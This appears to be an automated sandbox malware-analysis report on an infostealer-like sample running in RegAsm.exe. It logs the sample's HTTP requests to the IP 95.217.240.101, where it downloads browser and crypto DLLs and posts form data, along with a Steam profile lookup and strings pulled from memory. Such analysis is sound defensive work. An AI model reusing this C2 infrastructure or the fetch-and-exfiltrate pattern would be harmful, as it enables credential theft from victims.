                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040514C
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://store.st
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: RegAsm.exe, 00000002.00000002.2647482481.000000001B6CD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://95.217.240.101
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/D
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/O
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/freebl3.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/freebl3.dllwT=
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/mozglue.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/msvcp140.dllsS9
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/msvcp140.dllyS#
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/nss3.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/softokn3.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/softokn3.dlleS
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/sqlx.dll
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/sqlx.dllI
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/vcruntime140.dll
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101IDH
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101KEG
                  Source: HIEBAK.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                  Source: HIEBAK.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: HIEBAK.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: HIEBAK.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&a
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=soQOTmUz
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtR
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=L3Ed_Gybseku&l=e
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                  Source: HIEBAK.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: HIEBAK.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: HIEBAK.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://help.steampowered.com/en/
                  Source: GCGDGH.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://mozilla.org0/
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
